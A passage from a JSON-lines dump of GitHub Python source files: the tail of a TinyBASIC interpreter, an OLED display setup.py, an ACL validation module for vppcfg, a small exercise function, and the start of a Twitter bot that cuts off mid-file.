maxLine:\n if linePointer in lines:\n executeTokens(lines[linePointer])\n if stopExecution:\n stopExecution = False\n break\n linePointer = linePointer + 1\n # bug fixed: clear identifiers after execution\n resetExcution()\n elif command == \"SAVE\":\n if not(saveHandler(tokens[1:])): stopExecution = True\n elif command == \"LOAD\":\n if not(loadHandler(tokens[1:])): stopExecution = True\n elif command == \"GOSUB\":\n if not(gosubHandler(tokens[1:])): stopExecution = True\n elif command == \"RETURN\":\n if len(tokens) != 1:\n print(\"Error: Invalid return command.\")\n stopExecution = True\n if not(returnHandler()): stopExecution = True\n elif command == \"STA\":\n if not(staHandler(tokens[1:])): stopExecution = True\n elif command == \"LDA\":\n if not(ldaHandler(tokens[1:])): stopExecution = True\n elif command == \"STS\":\n if not(stsHandler(tokens[1:])): stopExecution = True\n elif command == \"LDS\":\n if not(ldsHandler(tokens[1:])): stopExecution = True\n elif command == \"STT\":\n if not(sttHandler(tokens[1:])): stopExecution = True\n elif command == \"LDT\":\n if not(ldtHandler(tokens[1:])): stopExecution = True\n\n\ndef getNumberPrintFormat(num):\n if int(num) == float(num):\n return int(num)\n return num\n\ndef saveHandler(tokens):\n global lines, maxLine, printReady\n printReady = True\n if len(tokens) != 1:\n print(\"Error: Invalid arguments.\")\n return False\n if tokens[0][1] != \"STRING\":\n print(\"Error: Invalid filename.\")\n return False\n filename = tokens[0][0]\n # if file extension not specified, add .tb\n if '.' not in filename:\n filename = filename + '.tb'\n # if the file already exists, ask the user if he wants to overwrite it\n if os.path.isfile(filename):\n overwrite = input(f\"File {filename} already exists. Overwrite? (y/n)\")\n if overwrite.lower() != \"y\":\n return False\n with open(filename, 'w') as f:\n # basicly copy from \"LIST\" command\n for i in range(maxLine + 1):\n if i in lines:\n line = str(i)\n for token in lines[i]:\n tokenVal = \"\"\n if token[1] == \"NUM\":\n tokenVal = getNumberPrintFormat(token[0])\n elif token[1] == \"STRING\":\n tokenVal = f\"\\\"{token[0]}\\\"\"\n else:\n tokenVal = token[0]\n line += \" \" + str(tokenVal)\n f.write(line + \"\\n\")\n return True\n\ndef loadHandler(tokens):\n global lines, maxLine, printReady\n printReady = True\n if len(tokens) != 1:\n print(\"Error: Invalid arguments.\")\n return False\n if tokens[0][1] != \"STRING\":\n print(\"Error: Invalid filename.\")\n return False\n filename = tokens[0][0]\n # if file extension not specified, add .tb\n if '.' not in filename:\n filename = filename + '.tb'\n try:\n with open(filename, 'r') as f:\n # basicly copy from \"if tokens[0][1] == \"NUM\":\" in executeTokens()\n clearLines()\n for line in f:\n tokens = lex(line.strip())\n if len(tokens) == 0:\n continue\n if tokens[0][1] == \"NUM\":\n lineNumber = int(tokens.pop(0)[0])\n if len(tokens) != 0:\n lines[lineNumber] = tokens\n if lineNumber > maxLine:\n maxLine = lineNumber\n else:\n lines.pop(lineNumber, None)\n else:\n print(\"Error: Invalid line number.\")\n return False\n except FileNotFoundError:\n print(\"Error: File not found.\")\n return False\n return True\n\ndef gotoHandler(tokens):\n global linePointer\n if len(tokens) == 0:\n print(\"Error: Expected expression.\")\n return\n newNumber = solveExpression(tokens, 0)\n if newNumber[1] != \"NUM\":\n print(\"Error: Line number expected.\")\n else:\n linePointer = newNumber[0] - 1\n return True\n\ndef gosubHandler(tokens):\n global linePointer, identifiers, returnPos\n if len(tokens) == 0:\n print(\"Error: Expected expression.\")\n return\n newNumber = solveExpression(tokens, 0)\n if newNumber[1] != \"NUM\":\n print(\"Error: Line number expected.\")\n else:\n returnPos.insert(0, linePointer) # push current line number to stack\n identifiers.insert(0, {}) # variable scope for subroutine\n linePointer = newNumber[0] - 1 # jump to subroutine\n return True\n\ndef returnHandler():\n global linePointer, identifiers, returnPos\n if len(returnPos) == 0:\n print(\"Error: Not in a subroutine.\")\n return\n linePointer = returnPos.pop(0) # pop current line number from stack\n identifiers.pop(0)\n return True\n\ndef inputHandler(tokens):\n varName = None\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n elif len(tokens) == 1 and tokens[0][1] == \"ID\":\n varName = tokens[0][0]\n else:\n varName = solveExpression(tokens, 0)[0]\n if not(isValidIdentifier(varName)):\n print(f\"Error: {varName} is not a valid identifier.\")\n return\n while True:\n print(\"?\", end = '')\n varValue = input()\n if getVarType(varName) == \"STRING\":\n identifiers[0][varName] = [varValue, \"STRING\"]\n break\n else:\n if is_number(varValue):\n # bug fixed: varValue -> float(varValue)\n identifiers[0][varName] = [float(varValue), \"NUM\"] \n break\n else:\n print(\"Try again.\")\n return True\n\ndef ifHandler(tokens):\n thenPos = elsePos = None\n for i in range(0, len(tokens)):\n if tokens[i] == [\"THEN\", \"RESVD\"]: # THEN is change to be a reserved word\n thenPos = i\n break\n for i in range(0, len(tokens)): # find the position of \"ELSE\"\n if tokens[i] == [\"ELSE\", \"RESVD\"]:\n elsePos = i\n break\n # if \"THEN\" is not found or \"ELSE\" is found before \"THEN\"\n if thenPos == None or (elsePos and thenPos > elsePos): \n print(\"Error: Malformed IF statement.\")\n return\n exprValue = solveExpression(tokens[0:thenPos], 0)\n if exprValue == None:\n return\n elif exprValue[0] != 0:\n if len(tokens[thenPos+1:elsePos]) == 0:\n print(\"Error: Malformed IF statement.\")\n return \n executeTokens(tokens[thenPos+1:elsePos])\n # if \"ELSE\" is found, and exprValue is False\n # execute the expression after \"ELSE\"\n elif elsePos: \n if len(tokens[elsePos+1:]) == 0:\n print(\"Error: Malformed IF statement.\")\n return\n executeTokens(tokens[elsePos+1:])\n return True\n\ndef forHandler(tokens):\n global identifiers\n toPos = doPos = None\n # find the position of \"TO\" and \"DO\"\n for i in range(0, len(tokens)):\n if tokens[i] == [\"TO\", \"RESVD\"]:\n toPos = i\n break\n for i in range(0, len(tokens)):\n if tokens[i] == [\"DO\", \"RESVD\"]:\n doPos = i\n break\n if toPos == None or doPos == None or toPos > doPos:\n print(\"Error: Malformed FOR statement.\")\n return \n # get a copy of iterator variable\n iterVar = None\n if getIdentifierValue(tokens[0][0]) != None:\n iterVar = getIdentifierValue(tokens[0][0])\n # set the iterator to the first value\n executeTokens([[\"LET\", \"RESVD\"]] + tokens[0:toPos])\n # calculate the end value\n endValue = solveExpression(tokens[toPos+1:doPos], 0)\n if endValue == None:\n return\n if endValue[1] != \"NUM\":\n print(\"Error: Expected number.\")\n return\n endValue = endValue[0]\n # execute the FOR statement\n while getIdentifierValue(tokens[0][0])[0] <= endValue:\n executeTokens(tokens[doPos+1:])\n tokens[toPos - 1][0] += 1\n executeTokens([[\"LET\", \"RESVD\"]] + tokens[0:toPos])\n # restore the iterator variable\n if iterVar != None:\n executeTokens([[\"LET\", \"RESVD\"]] + tokens[0:toPos - 1] + [iterVar])\n return True\n\ndef letHandler(tokens):\n varName = None\n varValue = None\n eqPos = None\n for i in range(0, len(tokens)):\n if tokens[i][1] == \"ASGN\":\n eqPos = i\n break\n if eqPos == None:\n print(\"Error: Malformed LET statement.\")\n return\n if eqPos == 1 and tokens[0][1] == \"ID\":\n varName = tokens[0][0]\n else:\n if len(tokens[0:i]) == 0:\n print(\"Error: Expected identifier.\")\n return\n varName = solveExpression(tokens[0:i], 0)\n if varName == None:\n stopExecution = True\n return\n varName = varName[0]\n if not(isValidIdentifier(varName)):\n print(f\"Error: {varName} is not a valid identifier.\")\n return\n if len(tokens[i+1:]) == 0:\n print(\"Error: Expected expression.\")\n return\n varValue = solveExpression(tokens[i+1:], 0)\n if varValue == None:\n return\n if getVarType(varName) != varValue[1]:\n print(f\"Error: Variable {varName} type mismatch.\")\n return\n identifiers[0][varName] = varValue\n return True\n\ndef printHandler(tokens):\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n exprRes = solveExpression(tokens, 0)\n if exprRes == None:\n return\n # bug fixed: print out a number will cause it convert to int\n value = exprRes[0]\n if exprRes[1] == \"NUM\":\n value = getNumberPrintFormat(value)\n print(value)\n return True\n\n# store number to rigister A\ndef staHandler(tokens):\n global registers\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n exprRes = solveExpression(tokens, 0)\n if exprRes == None:\n return\n if exprRes[1] != \"NUM\":\n print(\"Error: Rigister A expected number.\")\n return\n registers[\"A\"] = exprRes[0]\n return True\n\ndef stsHandler(tokens):\n global registers\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n exprRes = solveExpression(tokens, 0)\n if exprRes == None:\n return\n if exprRes[1] != \"NUM\":\n print(\"Error: Rigister A expected number.\")\n return\n registers[\"S\"] = exprRes[0]\n return True\n\ndef sttHandler(tokens):\n global registers\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n exprRes = solveExpression(tokens, 0)\n if exprRes == None:\n return\n if exprRes[1] != \"NUM\":\n print(\"Error: Rigister A expected number.\")\n return\n registers[\"T\"] = exprRes[0]\n return True\n\n# load number from rigister A\ndef ldaHandler(tokens):\n global registers\n varName = None\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n elif len(tokens) == 1 and tokens[0][1] == \"ID\":\n varName = tokens[0][0]\n else:\n varName = solveExpression(tokens, 0)[0]\n if not(isValidIdentifier(varName)):\n print(f\"Error: {varName} is not a valid identifier.\")\n return\n if getVarType(varName) != \"NUM\":\n print(f\"Error: Variable {varName} is not a number.\")\n return\n executeTokens([[\"LET\", \"RESVD\"], [varName, \"ID\"], [\"=\", \"ASGN\"], [registers[\"A\"], \"NUM\"]])\n return True\n\ndef ldsHandler(tokens):\n global registers\n varName = None\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n elif len(tokens) == 1 and tokens[0][1] == \"ID\":\n varName = tokens[0][0]\n else:\n varName = solveExpression(tokens, 0)[0]\n if not(isValidIdentifier(varName)):\n print(f\"Error: {varName} is not a valid identifier.\")\n return\n if getVarType(varName) != \"NUM\":\n print(f\"Error: Variable {varName} is not a number.\")\n return\n executeTokens([[\"LET\", \"RESVD\"], [varName, \"ID\"], [\"=\", \"ASGN\"], [registers[\"S\"], \"NUM\"]])\n return True\n\ndef ldtHandler(tokens):\n global registers\n varName = None\n if len(tokens) == 0:\n print(\"Error: Expected identifier.\")\n return\n elif len(tokens) == 1 and tokens[0][1] == \"ID\":\n varName = tokens[0][0]\n else:\n varName = solveExpression(tokens, 0)[0]\n if not(isValidIdentifier(varName)):\n print(f\"Error: {varName} is not a valid identifier.\")\n return\n if getVarType(varName) != \"NUM\":\n print(f\"Error: Variable {varName} is not a number.\")\n return\n executeTokens([[\"LET\", \"RESVD\"], [varName, \"ID\"], [\"=\", \"ASGN\"], [registers[\"T\"], \"NUM\"]])\n return True\n\ndef getIdentifierValue(name):\n try:\n return identifiers[0][name].copy()\n except KeyError:\n return None\n\ndef solveExpression(tokens, level):\n leftSideValues = []\n rightSideValues = []\n if level < len(operators):\n i = 0\n while i < len(tokens):\n if not(tokens[i][1] in [\"OP\", \"NUM\", \"STRING\", \"ID\", 'PAREN']):\n print(f\"Error: Unknown operand {tokens[i][0]}\")\n return None\n elif tokens[i][1] == \"PAREN\":\n # find the matching close parentheses\n close = findMatchingClose(tokens, i)\n if close == None:\n print(\"Error: Unmatched parentheses.\")\n return None\n # solve the expression inside the parentheses\n subExpr = solveExpression(tokens[i+1:close], 0)\n if subExpr == None:\n return None\n leftSideValues.append(subExpr)\n # continue to the next token\n i = close\n elif tokens[i][1] == \"OP\" and tokens[i][0] in operators[level]:\n exprResL = None\n exprResR = None\n if len(leftSideValues) != 0:\n exprResL = solveExpression(leftSideValues, level)\n rightSideValues = tokens[i+1:]\n if len(rightSideValues) != 0:\n exprResR = solveExpression(rightSideValues, level)\n \n if tokens[i][0] == \"+\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [exprResL[0] + exprResR[0], \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n elif tokens[i][0] == \"-\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [exprResL[0] - exprResR[0], \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n elif tokens[i][0] == \"/\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [exprResL[0] / exprResR[0], \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None \n elif tokens[i][0] == \"*\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [exprResL[0] * exprResR[0], \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None \n elif tokens[i][0] == \"^\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [exprResL[0] ** exprResR[0], \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n elif tokens[i][0] == \"%\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [exprResL[0] % exprResR[0], \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n elif tokens[i][0] == \"==\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n else:\n return [exprResL[0] == exprResR[0], \"NUM\"]\n elif tokens[i][0] == \"!=\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n else:\n return [exprResL[0] != exprResR[0], \"NUM\"]\n elif tokens[i][0] == \"<=\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n else:\n return [exprResL[0] <= exprResR[0], \"NUM\"]\n elif tokens[i][0] == \"<\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n else:\n return [exprResL[0] < exprResR[0], \"NUM\"]\n elif tokens[i][0] == \">\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n else:\n return [exprResL[0] > exprResR[0], \"NUM\"]\n elif tokens[i][0] == \">=\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n else:\n return [exprResL[0] >= exprResR[0], \"NUM\"]\n # operator <<\n elif tokens[i][0] == \"<<\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n if exprResL[1] != \"NUM\" or exprResR[1] != \"NUM\":\n print(\"Error: Operand type mismatch.\")\n return None\n if int(exprResL[0]) != exprResL[0] or int(exprResR[0]) != exprResR[0]:\n print(\"Error: Operand type mismatch.\")\n return None\n return [float(int(exprResL[0]) << int(exprResR[0])), \"NUM\"]\n # operator >>\n elif tokens[i][0] == \">>\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n if exprResL[1] != \"NUM\" or exprResR[1] != \"NUM\":\n print(\"Error: Operand type mismatch.\")\n return None\n if int(exprResL[0]) != exprResL[0] or int(exprResR[0]) != exprResR[0]:\n print(\"Error: Operand type mismatch.\")\n return None\n return [float(int(exprResL[0]) >> int(exprResR[0])), \"NUM\"]\n elif tokens[i][0] == \"&\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [(exprResL[0]) and (exprResR[0]), \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n elif tokens[i][0] == \"|\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n elif exprResL[1] == \"NUM\" and exprResR[1] == \"NUM\":\n return [(exprResL[0]) or (exprResR[0]), \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n elif tokens[i][0] == \".\":\n if exprResL == None or exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n else:\n value1 = exprResL[0]\n if exprResL[1] == \"NUM\":\n value1 = str(getNumberPrintFormat(value1))\n value2 = exprResR[0]\n if exprResR[1] == \"NUM\":\n value2 = str(getNumberPrintFormat(value2))\n return [value1 + value2, \"STRING\"]\n # operator !\n elif tokens[i][0] == \"!\":\n # as an unary operator, ! only takes one argument\n if exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n if exprResL != None:\n print(\"Error: ! is an unary operator.\")\n return None\n if exprResR[1] == \"NUM\":\n return [not exprResR[0], \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n # math function also handle as a unary operator\n elif tokens[i][0] in math_functions:\n if exprResR == None:\n print(\"Error: Operator expects value.\")\n return None\n if exprResL != None:\n print(\"Error: Function is unary operator.\")\n return None\n if exprResR[1] == \"NUM\":\n return [math_functions[tokens[i][0]](exprResR[0]), \"NUM\"]\n else:\n print(\"Error: Operand type mismatch.\")\n return None\n else:\n leftSideValues.append(tokens[i])\n i += 1\n return solveExpression(leftSideValues, level + 1)\n else:\n if len(tokens) > 1:\n print(\"Error: Operator expected.\")\n return None\n elif tokens[0][1] == \"ID\":\n if tokens[0][0] in identifiers[0]:\n return getIdentifierValue(tokens[0][0])\n else:\n print(f\"Error: Variable {tokens[0][0]} not initialized.\")\n return None\n return tokens[0]\n\ndef findMatchingClose(tokens, openIndex):\n openCount = 1\n for i in range(openIndex + 1, len(tokens)):\n if tokens[i][0] == \"(\":\n openCount += 1\n elif tokens[i][0] == \")\":\n openCount -= 1\n if openCount == 0:\n return i\n return None\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jeff082chen/tinybasic","sub_path":"tb.py","file_name":"tb.py","file_ext":"py","file_size_in_byte":34807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6123364259","text":"from distutils.core import setup, Extension\nimport numpy\nfrom rpi import is_raspberry_pi\n\nif is_raspberry_pi():\n module = Extension(\n 'liboled',\n sources=[\n 'oled/liboled.c',\n 'oled/ssd1331.c',\n ],\n include_dirs=[\"oled\", numpy.get_include()],\n extra_compile_args=[\"-Ofast\", \"-march=native\"],\n libraries=['bcm2835'],\n )\nelse:\n module = Extension(\n 'liboled',\n sources=[\n 'oled/liboled.c',\n 'oled/ssd1331.c',\n ],\n include_dirs=[\"oled\", \"oled/mocks\", numpy.get_include()],\n extra_compile_args=[\"-Ofast\", \"-march=native\"],\n )\n\nsetup(\n name='oled',\n version='0.1.0',\n description='Python wrapper for controlling an SSD1331 OLED display from a Raspberry Pi',\n author='Erasmus Cedernaes',\n author_email='erasmus.cedernaes@gmail.com',\n url='https://github.com/emanuelen5/rpi-led-server/',\n long_description='Python wrapper for controlling an OLED display',\n ext_modules=[module]\n)\n","repo_name":"emanuelen5/rpi-led-server","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22752527249","text":"import logging\nimport socket\nimport ipaddress\nfrom . import prefixlist\n\n\ndef get_acls(yaml):\n \"\"\"Return a list of all acls.\"\"\"\n ret = []\n if \"acls\" in yaml:\n for aclname, _acl in yaml[\"acls\"].items():\n ret.append(aclname)\n return ret\n\n\ndef get_by_name(yaml, aclname):\n \"\"\"Return the acl by name, if it exists. Return None otherwise.\"\"\"\n try:\n if aclname in yaml[\"acls\"]:\n return aclname, yaml[\"acls\"][aclname]\n except KeyError:\n pass\n return None, None\n\n\ndef hydrate_term(acl_term):\n \"\"\"Adds all defaults to an ACL term\"\"\"\n\n if \"family\" not in acl_term:\n acl_term[\"family\"] = \"any\"\n if \"source\" not in acl_term:\n acl_term[\"source\"] = \"any\"\n if \"destination\" not in acl_term:\n acl_term[\"destination\"] = \"any\"\n\n if \"protocol\" not in acl_term or acl_term[\"protocol\"] == \"any\":\n acl_term[\"protocol\"] = 0\n\n if \"source-port\" not in acl_term:\n acl_term[\"source-port\"] = \"any\"\n if \"destination-port\" not in acl_term:\n acl_term[\"destination-port\"] = \"any\"\n if \"icmp-code\" not in acl_term:\n acl_term[\"icmp-code\"] = \"any\"\n if \"icmp-type\" not in acl_term:\n acl_term[\"icmp-type\"] = \"any\"\n\n return acl_term\n\n\ndef get_icmp_low_high(icmpstring):\n \"\"\"For a given icmp string, which can be either an integer or a range of\n integers including start/stop being omitted, eg 0-255, 10- or -10, or the\n string \"any\", return a tuple of (lowport, highport) or (None, None) upon\n error\"\"\"\n if isinstance(icmpstring, int):\n return int(icmpstring), int(icmpstring)\n if \"any\" == icmpstring:\n return 0, 255\n\n try:\n icmp = int(icmpstring)\n if icmp > 0:\n return icmp, icmp\n except:\n pass\n\n if icmpstring.startswith(\"-\"):\n icmp = int(icmpstring[1:])\n return 0, icmp\n\n if icmpstring.endswith(\"-\"):\n icmp = int(icmpstring[:-1])\n return icmp, 255\n\n try:\n icmps = icmpstring.split(\"-\")\n return int(icmps[0]), int(icmps[1])\n except:\n pass\n\n return None, None\n\n\ndef get_port_low_high(portstring):\n \"\"\"For a given port string, which can be either an integer, a symbolic port name\n in /etc/services, a range of integers including start/stop being omitted, eg\n 0-65535, 1024- or -1024, or the string \"any\", return a tuple of\n (lowport, highport) or (None, None) upon error\"\"\"\n if isinstance(portstring, int):\n return int(portstring), int(portstring)\n if \"any\" == portstring:\n return 0, 65535\n\n try:\n port = int(portstring)\n if port > 0:\n return port, port\n except:\n pass\n\n try:\n port = socket.getservbyname(portstring)\n return port, port\n except:\n pass\n\n if portstring.startswith(\"-\"):\n port = int(portstring[1:])\n return 0, port\n\n if portstring.endswith(\"-\"):\n port = int(portstring[:-1])\n return port, 65535\n\n try:\n ports = portstring.split(\"-\")\n return int(ports[0]), int(ports[1])\n except:\n pass\n\n return None, None\n\n\ndef is_ip(ip_string):\n \"\"\"Return True if the given ip_string is either an IPv4/IPv6 address or prefix.\"\"\"\n if not isinstance(ip_string, str):\n return False\n\n try:\n ipn = ipaddress.ip_network(ip_string, strict=False)\n return True\n except:\n pass\n return False\n\n\ndef get_network_list(yaml, network_string, want_ipv4=True, want_ipv6=True):\n \"\"\"Return the full list of source or destination address(es). This function resolves the\n 'source' or 'destination' field, which can either be an IP address, a Prefix, or the name\n of a Prefix List. It returns a list of ip_network() objects, including prefix. IP addresses\n will receive prefixlen /32 or /128. Optionally, want_ipv4 or want_ipv6 can be set to False\n to filter the list.\"\"\"\n\n ret = []\n if is_ip(network_string):\n ipn = ipaddress.ip_network(network_string, strict=False)\n if ipn.version == 4 and want_ipv4:\n ret = [ipn]\n if ipn.version == 6 and want_ipv6:\n ret = [ipn]\n return ret\n\n if network_string == \"any\":\n if want_ipv4:\n ret.append(ipaddress.ip_network(\"0.0.0.0/0\"))\n if want_ipv6:\n ret.append(ipaddress.ip_network(\"::/0\"))\n return ret\n\n return prefixlist.get_network_list(\n yaml, network_string, want_ipv4=want_ipv4, want_ipv6=want_ipv6\n )\n\n\ndef get_protocol(protostring):\n \"\"\"For a given protocol string, which can be either an integer or a symbolic port\n name in /etc/protocols, return the protocol number as integer, or None if it cannot\n be determined.\"\"\"\n if isinstance(protostring, int):\n return int(protostring)\n if \"any\" == protostring:\n return 0\n\n try:\n proto = int(protostring)\n if proto > 0:\n return proto\n except:\n pass\n\n try:\n proto = socket.getprotobyname(protostring)\n return proto\n except:\n pass\n\n return None\n\n\ndef network_list_has_family(network_list, version):\n \"\"\"Returns True if the given list of ip_network() elements has at least one\n element with the specified version, which can be either 4 or 6. Return False\n otherwise\"\"\"\n for m in network_list:\n if m.version == version:\n return True\n return False\n\n\ndef validate_acls(yaml):\n \"\"\"Validate the semantics of all YAML 'acls' entries\"\"\"\n result = True\n msgs = []\n logger = logging.getLogger(\"vppcfg.config\")\n logger.addHandler(logging.NullHandler())\n\n if not \"acls\" in yaml:\n return result, msgs\n\n for aclname, acl in yaml[\"acls\"].items():\n terms = 0\n for acl_term in acl[\"terms\"]:\n terms += 1\n orig_acl_term = acl_term.copy()\n acl_term = hydrate_term(acl_term)\n logger.debug(\n f\"acl {aclname} term {terms} orig {orig_acl_term} hydrated {acl_term}\"\n )\n if acl_term[\"family\"] == \"ipv4\":\n want_ipv4 = True\n want_ipv6 = False\n elif acl_term[\"family\"] == \"ipv6\":\n want_ipv4 = False\n want_ipv6 = True\n else:\n want_ipv4 = True\n want_ipv6 = True\n\n src_network_list = get_network_list(\n yaml, acl_term[\"source\"], want_ipv4=want_ipv4, want_ipv6=want_ipv6\n )\n dst_network_list = get_network_list(\n yaml, acl_term[\"destination\"], want_ipv4=want_ipv4, want_ipv6=want_ipv6\n )\n logger.debug(\n f\"acl {aclname} term {terms} src: {src_network_list} dst: {dst_network_list}\"\n )\n if len(src_network_list) == 0:\n msgs.append(\n f\"acl {aclname} term {terms} family {acl_term['family']} has no source\"\n )\n result = False\n if len(dst_network_list) == 0:\n msgs.append(\n f\"acl {aclname} term {terms} family {acl_term['family']} has no destination\"\n )\n result = False\n if len(dst_network_list) == 0 or len(src_network_list) == 0:\n ## Pointless to continue if there's no src/dst at all\n continue\n\n src_network_has_ipv4 = network_list_has_family(src_network_list, 4)\n dst_network_has_ipv4 = network_list_has_family(dst_network_list, 4)\n src_network_has_ipv6 = network_list_has_family(src_network_list, 6)\n dst_network_has_ipv6 = network_list_has_family(dst_network_list, 6)\n\n if (\n src_network_has_ipv4 != dst_network_has_ipv4\n and src_network_has_ipv6 != dst_network_has_ipv6\n ):\n msgs.append(\n f\"acl {aclname} term {terms} source and destination family do not overlap\"\n )\n result = False\n continue\n\n proto = get_protocol(acl_term[\"protocol\"])\n if proto is None:\n msgs.append(f\"acl {aclname} term {terms} could not understand protocol\")\n result = False\n\n if not proto in [6, 17]:\n if \"source-port\" in orig_acl_term:\n msgs.append(\n f\"acl {aclname} term {terms} source-port can only be specified for protocol tcp or udp\"\n )\n result = False\n if \"destination-port\" in orig_acl_term:\n msgs.append(\n f\"acl {aclname} term {terms} destination-port can only be specified for protocol tcp or udp\"\n )\n result = False\n else:\n src_low_port, src_high_port = get_port_low_high(acl_term[\"source-port\"])\n dst_low_port, dst_high_port = get_port_low_high(\n acl_term[\"destination-port\"]\n )\n\n if src_low_port is None or src_high_port is None:\n msgs.append(\n f\"acl {aclname} term {terms} could not understand source-port\"\n )\n result = False\n else:\n if src_low_port > src_high_port:\n msgs.append(\n f\"acl {aclname} term {terms} source-port low value is greater than high value\"\n )\n result = False\n if src_low_port < 0 or src_low_port > 65535:\n msgs.append(\n f\"acl {aclname} term {terms} source-port low value is not between [0,65535]\"\n )\n result = False\n if src_high_port < 0 or src_high_port > 65535:\n msgs.append(\n f\"acl {aclname} term {terms} source-port high value is not between [0,65535]\"\n )\n result = False\n\n if dst_low_port is None or dst_high_port is None:\n msgs.append(\n f\"acl {aclname} term {terms} could not understand destination-port\"\n )\n result = False\n else:\n if dst_low_port > dst_high_port:\n msgs.append(\n f\"acl {aclname} term {terms} destination-port low value is greater than high value\"\n )\n result = False\n if dst_low_port < 0 or dst_low_port > 65535:\n msgs.append(\n f\"acl {aclname} term {terms} destination-port low value is not between [0,65535]\"\n )\n result = False\n if dst_high_port < 0 or dst_high_port > 65535:\n msgs.append(\n f\"acl {aclname} term {terms} destination-port high value is not between [0,65535]\"\n )\n result = False\n\n if not proto in [1, 58]:\n if \"icmp-code\" in orig_acl_term:\n msgs.append(\n f\"acl {aclname} term {terms} icmp-code can only be specified for protocol icmp or ipv6-icmp\"\n )\n result = False\n if \"icmp-type\" in orig_acl_term:\n msgs.append(\n f\"acl {aclname} term {terms} icmp-type can only be specified for protocol icmp or ipv6-icmp\"\n )\n result = False\n else:\n icmp_code_low, icmp_code_high = get_icmp_low_high(acl_term[\"icmp-code\"])\n icmp_type_low, icmp_type_high = get_icmp_low_high(acl_term[\"icmp-type\"])\n if icmp_code_low > icmp_code_high:\n msgs.append(\n f\"acl {aclname} term {terms} icmp-code low value is greater than high value\"\n )\n result = False\n if icmp_type_low > icmp_type_high:\n msgs.append(\n f\"acl {aclname} term {terms} icmp-type low value is greater than high value\"\n )\n result = False\n\n return result, msgs\n","repo_name":"pimvanpelt/vppcfg","sub_path":"vppcfg/config/acl.py","file_name":"acl.py","file_ext":"py","file_size_in_byte":12469,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"61"} +{"seq_id":"19828661334","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 22 15:26:13 2023\n\n@author: Karin Sofi\n\"\"\"\n\nx1 = \"a\"\nx2 = -2.0\nx3 = 0.0\n\n\ndef my_func(x1, x2, x3):\n if isinstance(x1, float) and isinstance(x2, float) and isinstance(x3, float) == True:\n xT = (x1 + x2 + x3)\n up = xT * (x2 + x3) * x3\n if xT == 0:\n return 'Not a number – denominator equals zero'\n else:\n return (up / xT)\n elif isinstance(x1, int) and isinstance(x2, int) and isinstance(x3, int) == True:\n return 'Error: parameters should be float'\n else:\n return 'None'\n\n\nx = my_func(x1, x2, x3)\nprint(x)\n\n","repo_name":"KarinLevSofi/Ex1","sub_path":"Ex1.py","file_name":"Ex1.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71230629316","text":"import json\nimport asyncio\nimport sys\nimport shutil\nimport tempfile\nimport os\nimport aiohttp\n\nfrom io import StringIO\nfrom random import randint, choice\nfrom time import sleep\nfrom bs4 import BeautifulSoup # type: ignore\n\nfrom tweepy import API, OAuthHandler, TweepError # type: ignore\n\nimport utils\nimport mememaker\n\n\nasync def create_api() -> API:\n key = os.environ[\"KIITENSUPORT_ACCESS_KEY\"]\n secret = 